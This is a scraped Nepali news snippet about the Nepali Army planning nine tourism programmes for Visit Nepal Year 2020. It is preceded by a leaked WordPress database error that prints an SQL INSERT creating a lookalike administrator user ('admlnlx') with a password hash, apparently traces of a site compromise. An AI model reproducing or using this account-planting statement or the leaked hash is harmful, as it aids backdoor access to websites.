WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAKCG5wNqFByE/48bPKb0ZuTNY.Xx8.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 16:32:35', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, नेपाल भ्रमण वर्ष २०२० को अवसरमा नेपाली सेनाले पर्यटन प्रवद्र्धनसम्बन्धी विभिन्न ९ वटा कार्यक्रम गर्ने भएको छ ।
नेपाली सेनाले एभरेस्ट एक्सपिडिसन तथा क्लियरिङ क्याम्पेन, जंगल सफारी, माउन्टेन ट्रेकिङ, नेपाल म्याराथन, पिस सेमिनार तथा रन फर फन कार्यक्रम, एकीकरण पदयात्रा कार्यक्रम गर्ने जनाएको छ ।
त्यस्तै प्याराग्लाइडिङ, लिगलिगकोट दौड र ओपन एडभेन्चर कार्यक्रम पनि गर्ने नेपाली सेनाले जनाएको छ ।
sourse:shikharpost